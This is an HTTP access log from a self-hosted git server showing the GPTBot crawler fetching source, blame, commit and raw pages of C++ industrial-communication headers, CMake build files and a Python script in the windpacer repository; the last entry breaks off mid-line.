"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:16:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12879] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12508] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10084] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11167] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13025] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12510] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11433] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10244] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 